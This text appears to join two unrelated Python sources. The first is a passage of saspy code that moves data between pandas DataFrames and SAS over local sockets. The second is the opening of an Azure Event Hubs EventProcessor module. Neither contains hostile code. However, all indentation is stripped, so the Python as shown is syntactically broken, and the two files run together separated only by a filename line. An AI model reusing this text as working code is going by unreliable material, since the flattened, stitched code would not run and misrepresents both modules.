try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
logger.error("Failed connecting to server socket. Check the SASLOG to see the error")
ll = self.submit("", 'text')
return row_num
first = False
if server:
sock.close()
sock = socks.socket()
sock.connect((host, port))
ssock = sock
sleep(1)
pass
send -= sent
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return None
def dataframe2sasdataORIG(self, df: '<Pandas Data Frame object>', table: str ='a',
libref: str ="", keep_outer_quotes: bool=False,
embedded_newlines: bool=True,
LF: str = '\x01', CR: str = '\x02',
colsep: str = '\x03', colrep: str = ' ',
datetimes: dict={}, outfmts: dict={}, labels: dict={},
outdsopts: dict={}, encode_errors = None, char_lengths = None,
**kwargs):
"""
This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.
df - Pandas Data Frame to import to a SAS Data Set
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.
      embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them imported into the SAS data set
      LF - if embedded_newlines=True, the character to use for LF when transferring the data; defaults to '\x01'
      CR - if embedded_newlines=True, the character to use for CR when transferring the data; defaults to '\x02'
      colsep - the column separator character used for streaming the delimited data to SAS; defaults to '\x03'
datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes
outfmts - dict with column names and SAS formats to assign to the new SAS data set
labels - dict with column names and SAS Labels to assign to the new SAS data set
outdsopts - a dictionary containing output data set options for the table being created
encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char
char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set
"""
input = ""
xlate = ""
card = ""
format = ""
length = ""
label = ""
dts = []
ncols = len(df.columns)
lf = "'"+'%02x' % ord(LF.encode(self.sascfg.encoding))+"'x"
cr = "'"+'%02x' % ord(CR.encode(self.sascfg.encoding))+"'x "
delim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x "
dtkeys = datetimes.keys()
fmtkeys = outfmts.keys()
labkeys = labels.keys()
if encode_errors is None:
encode_errors = 'fail'
bpc = self._sb.pyenc[0]
if char_lengths and str(char_lengths).strip() in ['1','2','3','4']:
bpc = int(char_lengths)
if char_lengths and str(char_lengths) == 'exact':
CnotB = False
else:
CnotB = bpc == 1
if type(char_lengths) is not dict:
charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)
else:
charlens = char_lengths
if charlens is None:
return -1
charlens = {k.upper():v for k,v in charlens.items()}
for name in df.columns:
colname = str(name).replace("'", "''")
input += "'"+colname+"'n "
if colname in labkeys:
label += "label '"+colname+"'n ="+labels[colname]+";\n"
if df.dtypes[name].kind in ('O','S','U','V'):
try:
length += " '"+colname+"'n $"+str(charlens[colname.upper()])
except KeyError as e:
logger.error("Dictionary provided as char_lengths is missing column: "+colname)
raise e
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if keep_outer_quotes:
input += "~ "
dts.append('C')
if embedded_newlines:
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0A'x, "+lf+");\n"
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0D'x, "+cr+");\n"
else:
if df.dtypes[name].kind in ('M'):
length += " '"+colname+"'n 8"
input += ":B8601DT26.6 "
if colname not in dtkeys:
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
else:
if datetimes[colname].lower() == 'date':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DA. "
xlate += " '"+colname+"'n = datepart('"+colname+"'n);\n"
else:
if datetimes[colname].lower() == 'time':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601TM. "
xlate += " '"+colname+"'n = timepart('"+colname+"'n);\n"
else:
logger.warning("invalid value for datetimes for column "+colname+". Using default.")
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
dts.append('D')
else:
length += " '"+colname+"'n 8"
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if df.dtypes[name] == 'bool':
dts.append('B')
else:
dts.append('N')
code = "data "
if len(libref):
code += libref+"."
code += "'"+table.strip().replace("'", "''")+"'n"
if len(outdsopts):
code += '('
for key in outdsopts:
code += key+'='+str(outdsopts[key]) + ' '
code += ");\n"
else:
code += ";\n"
if len(length):
code += "length"+length+";\n"
if len(format):
code += "format "+format+";\n"
code += label
code += "infile datalines delimiter="+delim+" STOPOVER;\ninput @;\nif _infile_ = '' then delete;\n"
code += "else do;\n input "+input+";\n"+xlate+";\nend;\ndatalines4;"
self._asubmit(code, "text")
logf = b''
blksz = int(kwargs.get('blocksize', 32767))
row_num = 0
code = ""
for row in df.itertuples(index=False):
row_num += 1
card = ""
for col in range(ncols):
var = str(row[col])
if dts[col] == 'N' and var == 'nan':
var = '.'
elif dts[col] == 'C':
if var == 'nan' or len(var) == 0:
var = ' '
else:
var = var.replace(colsep, colrep)
elif dts[col] == 'B':
var = str(int(row[col]))
elif dts[col] == 'D':
if var in ['nan', 'NaT', 'NaN']:
var = '.'
else:
var = str(row[col].to_datetime64())[:26]
card += var
if col < (ncols-1):
card += colsep
if embedded_newlines:
card = card.replace(LF, colrep).replace(CR, colrep)
card = card.replace('\n', LF).replace('\r', CR)
code += card+"\n"
if len(code) > blksz:
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
logger.error("Transcoding error encountered. Data transfer stopped on or before row "+str(row_num))
logger.error("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
#self.stdin.write(code+b'\n')
os.write(self.pin, code+b'\n')
self.stdin.flush()
code = ""
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if len(code):
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
logger.error("Transcoding error encountered. Data transfer stopped on row "+str(row_num))
logger.error("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
#self.stdin.write(code+b'\n')
os.write(self.pin, code+b'\n')
self.stdin.flush()
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
return None
def sasdata2dataframe(self, table: str, libref: str ='', dsopts: dict = None,
rowsep: str = '\x01', colsep: str = '\x02',
rowrep: str = ' ', colrep: str = ' ',
port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
"""
This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
table - the name of the SAS Data Set you want to export to a Pandas Data Frame
        libref - the libref for the SAS Data Set.
        dsopts - data set options for the input SAS Data Set
        rowsep - the row separator character to use; defaults to '\x01'
        colsep - the column separator character to use; defaults to '\x02'
rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '
colrep - the char to convert to for any embedded colsep chars, defaults to ' '
port - port to use for socket. Defaults to 0 which uses a random available ephemeral port
wait - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
"""
dsopts = dsopts if dsopts is not None else {}
method = kwargs.pop('method', None)
if method and method.lower() == 'csv':
return self.sasdata2dataframeCSV(table, libref, dsopts, port=port, wait=wait, **kwargs)
#elif method and method.lower() == 'disk':
else:
return self.sasdata2dataframeDISK(table, libref, dsopts, rowsep, colsep,
rowrep, colrep, port=port, wait=wait, **kwargs)
def sasdata2dataframeCSV(self, table: str, libref: str ='', dsopts: dict = None, opts: dict = None,
port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
"""
This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
table - the name of the SAS Data Set you want to export to a Pandas Data Frame
libref - the libref for the SAS Data Set.
dsopts - data set options for the input SAS Data Set
opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)
tempfile - DEPRECATED
tempkeep - DEPRECATED
port - port to use for socket. Defaults to 0 which uses a random available ephemeral port
wait - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
These two options are for advanced usage. They override how saspy imports data. For more info
see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques
dtype - this is the parameter to Pandas read_csv, overriding what saspy generates and uses
my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=
"""
tmp = kwargs.pop('tempfile', None)
tmp = kwargs.pop('tempkeep', None)
dsopts = dsopts if dsopts is not None else {}
opts = opts if opts is not None else {}
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if libref:
tabname = libref+".'"+table.strip().replace("'", "''")+"'n "
else:
tabname = "'"+table.strip().replace("'", "''")+"'n "
code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
code += "put lr lrecl; put vn nvars; put vl;\n"
code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
code += "put vt;\n"
code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
code += "run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("LRECL= ")
l2 = l2[2].partition("\n")
lrecl = int(l2[0])
l2 = l2[2].partition("VARNUMS= ")
l2 = l2[2].partition("\n")
nvars = int(l2[0])
l2 = l2[2].partition("\n")
varlist = l2[2].split("\n", nvars)
del varlist[nvars]
dvarlist = list(varlist)
for i in range(len(varlist)):
varlist[i] = varlist[i].replace("'", "''")
l2 = l2[2].partition("VARTYPE=")
l2 = l2[2].partition("\n")
vartype = l2[2].split("\n", nvars)
del vartype[nvars]
topts = dict(dsopts)
topts.pop('firstobs', None)
topts.pop('obs', None)
code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
code += "data work._n_u_l_l_;output;run;\n"
code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"
for i in range(nvars):
code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("FMT_CATS=")
l2 = l2[2].partition("\n")
varcat = l2[2].split("\n", nvars)
del varcat[nvars]
try:
sock = socks.socket()
if not self.sascfg.ssh or self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
            logger.error('Error trying to open a socket in the sasdata2dataframe method. Call failed.')
return None
if self.sascfg.ssh and not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
code = "filename sock socket '"+host+":"+str(port)+"' lrecl="+str(self.sascfg.lrecl)+" recfm=v encoding='utf-8';\n"
code += "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";\nformat "
idx_col = kwargs.pop('index_col', False)
eng = kwargs.pop('engine', 'c')
my_fmts = kwargs.pop('my_fmts', False)
k_dts = kwargs.pop('dtype', None)
if k_dts is None and my_fmts:
logger.warning("my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.")
my_fmts = False
if not my_fmts:
for i in range(nvars):
if vartype[i] == 'N':
code += "'"+varlist[i]+"'n "
if varcat[i] in self._sb.sas_date_fmts:
code += 'E8601DA10. '
else:
if varcat[i] in self._sb.sas_time_fmts:
code += 'E8601TM15.6 '
else:
if varcat[i] in self._sb.sas_datetime_fmts:
code += 'E8601DT26.6 '
else:
code += 'best32. '
code += ";\n run;\n"
ll = self.submit(code, "text")
if k_dts is None:
dts = {}
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
dts[dvarlist[i]] = 'float'
else:
dts[dvarlist[i]] = 'str'
else:
dts[dvarlist[i]] = 'str'
else:
dts = k_dts
code = ''
code = "proc export data=work.sasdata2dataframe outfile=sock dbms=csv replace;\n"
code += self._sb._expopts(opts)+" run;\n"
code += "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
sock.listen(1)
self._asubmit(code, 'text')
if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
            logger.error("An error occurred in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
sock.close()
ll = self.submit("", 'text')
return ll['LOG']
newsock = (0,0)
try:
newsock = sock.accept()
sockout = _read_sock(newsock=newsock, rowsep=b'\n')
df = pd.read_csv(sockout, index_col=idx_col, encoding='utf8', engine=eng, dtype=dts, **kwargs)
except (KeyboardInterrupt, Exception) as e:
            logger.error("sasdata2dataframe was interrupted. Trying to return the saslog instead of a data frame.")
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return str(e)+"\n\n"+ll['LOG']
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
ll = self.submit("", 'text')
if k_dts is None: # don't override these if user provided their own dtypes
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
df[dvarlist[i]] = pd.to_datetime(df[dvarlist[i]], errors='coerce')
return df
def sasdata2dataframeDISK(self, table: str, libref: str ='', dsopts: dict = None,
rowsep: str = '\x01', colsep: str = '\x02',
rowrep: str = ' ', colrep: str = ' ', port: int=0,
wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
"""
This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
table - the name of the SAS Data Set you want to export to a Pandas Data Frame
libref - the libref for the SAS Data Set.
dsopts - data set options for the input SAS Data Set
        rowsep - the row separator character to use; defaults to '\x01'
        colsep - the column separator character to use; defaults to '\x02'
rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '
colrep - the char to convert to for any embedded colsep chars, defaults to ' '
tempfile - DEPRECATED
tempkeep - DEPRECATED
port - port to use for socket. Defaults to 0 which uses a random available ephemeral port
wait - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
These two options are for advanced usage. They override how saspy imports data. For more info
see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques
dtype - this is the parameter to Pandas read_csv, overriding what saspy generates and uses
my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=
"""
tmp = kwargs.pop('tempfile', None)
tmp = kwargs.pop('tempkeep', None)
dsopts = dsopts if dsopts is not None else {}
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if libref:
tabname = libref+".'"+table.strip().replace("'", "''")+"'n "
else:
tabname = "'"+table.strip().replace("'", "''")+"'n "
code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
code += "put lr lrecl; put vn nvars; put vl;\n"
code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
code += "put vt;\n"
code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
code += "run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("LRECL= ")
l2 = l2[2].partition("\n")
lrecl = int(l2[0])
l2 = l2[2].partition("VARNUMS= ")
l2 = l2[2].partition("\n")
nvars = int(l2[0])
l2 = l2[2].partition("\n")
varlist = l2[2].split("\n", nvars)
del varlist[nvars]
dvarlist = list(varlist)
for i in range(len(varlist)):
varlist[i] = varlist[i].replace("'", "''")
l2 = l2[2].partition("VARTYPE=")
l2 = l2[2].partition("\n")
vartype = l2[2].split("\n", nvars)
del vartype[nvars]
topts = dict(dsopts)
topts.pop('firstobs', None)
topts.pop('obs', None)
code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
code += "data work._n_u_l_l_;output;run;\n"
code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"
for i in range(nvars):
code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("FMT_CATS=")
l2 = l2[2].partition("\n")
varcat = l2[2].split("\n", nvars)
del varcat[nvars]
try:
sock = socks.socket()
if not self.sascfg.ssh or self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
            logger.error('Error trying to open a socket in the sasdata2dataframe method. Call failed.')
return None
if self.sascfg.ssh and not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
code = "filename sock socket '"+host+":"+str(port)+"' recfm=s encoding='utf-8';\n"
rdelim = "'"+'%02x' % ord(rowsep.encode(self.sascfg.encoding))+"'x"
cdelim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x"
idx_col = kwargs.pop('index_col', False)
eng = kwargs.pop('engine', 'c')
my_fmts = kwargs.pop('my_fmts', False)
k_dts = kwargs.pop('dtype', None)
if k_dts is None and my_fmts:
logger.warning("my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.")
my_fmts = False
code += "data _null_; set "+tabname+self._sb._dsopts(dsopts)+";\n"
if not my_fmts:
for i in range(nvars):
if vartype[i] == 'N':
code += "format '"+varlist[i]+"'n "
if varcat[i] in self._sb.sas_date_fmts:
code += 'E8601DA10.'
else:
if varcat[i] in self._sb.sas_time_fmts:
code += 'E8601TM15.6'
else:
if varcat[i] in self._sb.sas_datetime_fmts:
code += 'E8601DT26.6'
else:
code += 'best32.'
code += '; '
if i % 10 == 9:
code +='\n'
miss = {}
code += "\nfile sock dlm="+cdelim+";\n"
for i in range(nvars):
if vartype[i] != 'N':
code += "'"+varlist[i]+"'n = translate('"
code += varlist[i]+"'n, '{}'x, '{}'x); ".format( \
'%02x%02x' % \
(ord(rowrep.encode(self.sascfg.encoding)), \
ord(colrep.encode(self.sascfg.encoding))),
'%02x%02x' % \
(ord(rowsep.encode(self.sascfg.encoding)), \
ord(colsep.encode(self.sascfg.encoding))))
miss[dvarlist[i]] = ' '
else:
code += "if missing('"+varlist[i]+"'n) then '"+varlist[i]+"'n = .; "
miss[dvarlist[i]] = '.'
if i % 10 == 9:
code +='\n'
code += "\nput "
for i in range(nvars):
code += " '"+varlist[i]+"'n "
if i % 10 == 9:
code +='\n'
code += rdelim+";\nrun;"
if k_dts is None:
dts = {}
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
dts[dvarlist[i]] = 'float'
else:
dts[dvarlist[i]] = 'str'
else:
dts[dvarlist[i]] = 'str'
else:
dts = k_dts
quoting = kwargs.pop('quoting', 3)
sock.listen(1)
self._asubmit(code, 'text')
if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
            logger.error("An error occurred in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
sock.close()
ll = self.submit("", 'text')
return ll['LOG']
newsock = (0,0)
try:
newsock = sock.accept()
sockout = _read_sock(newsock=newsock, rowsep=rowsep.encode())
df = pd.read_csv(sockout, index_col=idx_col, engine=eng, header=None, names=dvarlist,
sep=colsep, lineterminator=rowsep, dtype=dts, na_values=miss,
encoding='utf8', quoting=quoting, **kwargs)
except (KeyboardInterrupt, Exception) as e:
logger.error(e)
            logger.error("sasdata2dataframe was interrupted. Trying to return the saslog instead of a data frame.")
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return str(e)+"\n\n"+ll['LOG']
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
ll = self.submit("", 'text')
if k_dts is None: # don't override these if user provided their own dtypes
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
df[dvarlist[i]] = pd.to_datetime(df[dvarlist[i]], errors='coerce')
return df
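# Hedged usage sketch (not called anywhere in this module): the data-transfer methods above are
# normally reached through saspy's public SASsession API rather than invoked directly. This
# assumes a working saspy configuration and a reachable SAS session; the table and libref
# names are illustrative only.
def _example_df_round_trip():
    import pandas as pd
    import saspy
    sas = saspy.SASsession()                                  # uses the local saspy configuration
    df = pd.DataFrame({"x": [1, 2, 3], "y": ["a", "b", "c"]})
    sas.df2sd(df, table="demo", libref="work")                # exercises the dataframe2sasdata path
    back = sas.sd2df("demo", libref="work", method="DISK")    # exercises sasdata2dataframeDISK above
    print(back.head())
    sas.endsas()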
class _read_sock(io.StringIO):
def __init__(self, **kwargs):
self.newsock = kwargs.get('newsock')
self.rowsep = kwargs.get('rowsep')
self.datar = b""
def read(self, size=4096):
datl = 0
size = max(size, 4096)
notarow = True
while datl < size or notarow:
data = self.newsock[0].recv(size)
dl = len(data)
if dl:
datl += dl
self.datar += data
if notarow:
notarow = self.datar.count(self.rowsep) <= 0
else:
if len(self.datar) <= 0:
return ''
else:
break
data = self.datar.rpartition(self.rowsep)
datap = data[0]+data[1]
self.datar = data[2]
return datap.decode()
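# Hedged sketch (illustrative only, never called): a minimal, self-contained exercise of the
# row-separator buffering that _read_sock.read() above implements, using a local socketpair
# instead of a SAS session. The payload bytes are made up.
def _demo_read_sock_buffering():
    import socket as _socket
    left, right = _socket.socketpair()
    # Two "rows" delimited by '\x01', with '\x02' as the column separator, deliberately
    # split across two sends to show that partial rows stay buffered until complete.
    left.sendall(b"col1\x02col2\x01col")
    left.sendall(b"3\x02col4\x01")
    left.close()
    reader = _read_sock(newsock=(right, None), rowsep=b"\x01")
    print(reader.read())    # returns complete rows; a trailing partial row stays in the buffer
    right.close()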
|
event_processor.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import random
import uuid
import logging
import time
import threading
from typing import (
Dict,
Callable,
List,
Any,
Union,
TYPE_CHECKING,
Optional,
Iterable,
cast,
)
from functools import partial
from .._utils import get_event_links
from .partition_context import PartitionContext
from .in_memory_checkpoint_store import InMemoryCheckpointStore
from .ownership_manager import OwnershipManager
from .common import CloseReason, LoadBalancingStrategy
from ._eventprocessor_mixin import EventProcessorMixin
if TYPE_CHECKING:
from datetime import datetime
from .checkpoint_store import CheckpointStore
from .._common import EventData
from .._consumer import EventHubConsumer
from .._consumer_client import EventHubConsumerClient
_LOGGER = logging.getLogger(__name__)
class EventProcessor(
EventProcessorMixin
): # pylint:disable=too-many-instance-attributes
"""
An EventProcessor constantly receives events from one or multiple partitions of the Event Hub
in the context of a given consumer group.
"""
def __init__(
self,
eventhub_client, # type: EventHubConsumerClient
consumer_group, # type: str
on_event, # type: Callable[[PartitionContext, Union[Optional[EventData], List[EventData]]], None]
**kwargs # type: Any
):
# type: (...) -> None
# pylint: disable=line-too-long
self._consumer_group = consumer_group
self._eventhub_client = eventhub_client
self._namespace = (
eventhub_client._address.hostname # pylint: disable=protected-access
)
self._eventhub_name = eventhub_client.eventhub_name
self._event_handler = on_event
self._batch = kwargs.get("batch") or False
self._max_batch_size = kwargs.get("max_batch_size") or 300
self._max_wait_time = kwargs.get("max_wait_time")
self._partition_id = kwargs.get("partition_id", None) # type: Optional[str]
self._error_handler = kwargs.get(
"on_error", None
) # type: Optional[Callable[[PartitionContext, Exception], None]]
self._partition_initialize_handler = kwargs.get(
"on_partition_initialize", None
) # type: Optional[Callable[[PartitionContext], None]]
self._partition_close_handler = kwargs.get(
"on_partition_close", None
) # type: Optional[Callable[[PartitionContext, CloseReason], None]]
checkpoint_store = kwargs.get("checkpoint_store") # type: Optional[CheckpointStore]
self._checkpoint_store = checkpoint_store or InMemoryCheckpointStore()
self._initial_event_position = kwargs.get(
"initial_event_position", "@latest"
) # type: Union[str, int, datetime, Dict[str, Any]]
self._initial_event_position_inclusive = kwargs.get(
"initial_event_position_inclusive", False
) # type: Union[bool, Dict[str, bool]]
self._load_balancing_interval = kwargs.get(
"load_balancing_interval", 10.0
) # type: float
self._load_balancing_strategy = kwargs.get("load_balancing_strategy") or LoadBalancingStrategy.GREEDY
self._ownership_timeout = kwargs.get(
"partition_ownership_expiration_interval", self._load_balancing_interval * 6)
self._partition_contexts = {} # type: Dict[str, PartitionContext]
# Receive parameters
self._owner_level = kwargs.get("owner_level", None) # type: Optional[int]
if checkpoint_store and self._owner_level is None:
self._owner_level = 0
self._prefetch = kwargs.get("prefetch", None) # type: Optional[int]
self._track_last_enqueued_event_properties = kwargs.get(
"track_last_enqueued_event_properties", False
)
self._id = str(uuid.uuid4())
self._running = False
self._lock = threading.RLock()
self._consumers = {} # type: Dict[str, EventHubConsumer]
self._ownership_manager = OwnershipManager(
self._eventhub_client,
self._consumer_group,
self._id,
self._checkpoint_store,
self._ownership_timeout,
self._load_balancing_strategy,
self._partition_id,
)
def __repr__(self):
# type: () -> str
return "EventProcessor: id {}".format(self._id)
def _process_error(self, partition_context, err):
if self._error_handler:
try:
self._error_handler(partition_context, err)
except Exception as err_again: # pylint:disable=broad-except
_LOGGER.warning(
"EventProcessor instance %r of eventhub %r partition %r consumer group %r. "
"An error occurred while running on_error. The exception is %r.",
self._id,
partition_context.eventhub_name,
partition_context.partition_id,
partition_context.consumer_group,
err_again,
)
def _cancel_tasks_for_partitions(self, to_cancel_partitions):
# type: (Iterable[str]) -> None
with self._lock:
_LOGGER.debug(
"EventProcessor %r tries to cancel partitions %r",
self._id,
to_cancel_partitions
)
for partition_id in to_cancel_partitions:
if partition_id in self._consumers:
self._consumers[partition_id].stop = True
_LOGGER.info(
"EventProcessor %r has cancelled partition %r",
self._id,
partition_id
)
def _initialize_partition_consumer(self, partition_id):
if self._partition_initialize_handler:
try:
self._partition_initialize_handler(self._partition_contexts[partition_id])
except Exception as err: # pylint:disable=broad-except
_LOGGER.warning(
"EventProcessor instance %r of eventhub %r partition %r consumer group %r. "
"An error occurred while running on_partition_initialize. The exception is %r.",
self._id,
self._partition_contexts[partition_id].eventhub_name,
self._partition_contexts[partition_id].partition_id,
self._partition_contexts[partition_id].consumer_group,
err,
)
self._process_error(self._partition_contexts[partition_id], err)
_LOGGER.info(
"EventProcessor %r has claimed partition %r",
self._id,
partition_id
)
def _create_tasks_for_claimed_ownership(self, claimed_partitions, checkpoints=None):
# type: (Iterable[str], Optional[Dict[str, Dict[str, Any]]]) -> None
with self._lock:
_LOGGER.debug(
"EventProcessor %r tries to claim partition %r",
self._id,
claimed_partitions
)
for partition_id in claimed_partitions:
if partition_id not in self._consumers:
if partition_id in self._partition_contexts:
partition_context = self._partition_contexts[partition_id]
partition_context._last_received_event = None # pylint:disable=protected-access
else:
partition_context = PartitionContext(
self._namespace,
self._eventhub_name,
self._consumer_group,
partition_id,
self._checkpoint_store,
)
self._partition_contexts[partition_id] = partition_context
checkpoint = checkpoints.get(partition_id) if checkpoints else None
(
initial_event_position,
                        event_position_inclusive,
) = self.get_init_event_position(partition_id, checkpoint)
event_received_callback = partial(
self._on_event_received, partition_context
)
self._consumers[partition_id] = cast(
"EventHubConsumer",
self.create_consumer(
partition_id,
initial_event_position,
                            event_position_inclusive,
event_received_callback,
),
)
self._initialize_partition_consumer(partition_id)
def _on_event_received(self, partition_context, event):
# type: (PartitionContext, Union[Optional[EventData], List[EventData]]) -> None
if event:
try:
partition_context._last_received_event = event[-1] # type: ignore #pylint:disable=protected-access
except TypeError:
partition_context._last_received_event = event # type: ignore #pylint:disable=protected-access
links = get_event_links(event)
with self._context(links=links):
self._event_handler(partition_context, event)
else:
self._event_handler(partition_context, event)
def _load_balancing(self):
        # type: () -> None
        """Repeatedly claim and balance partition ownership with other `EventProcessor`
        instances so that this processor keeps receiving EventData from the partitions it owns.
        Runs in a background thread started by `start` until the EventProcessor is stopped.
        :return: None
        """
while self._running:
random_jitter = self._load_balancing_interval * random.random() * 0.2
load_balancing_interval = self._load_balancing_interval + random_jitter
try:
claimed_partition_ids = self._ownership_manager.claim_ownership()
if claimed_partition_ids:
existing_pids = set(self._consumers.keys())
claimed_pids = set(claimed_partition_ids)
to_cancel_pids = existing_pids - claimed_pids
newly_claimed_pids = claimed_pids - existing_pids
if newly_claimed_pids:
checkpoints = (
self._ownership_manager.get_checkpoints()
if self._checkpoint_store
else None
)
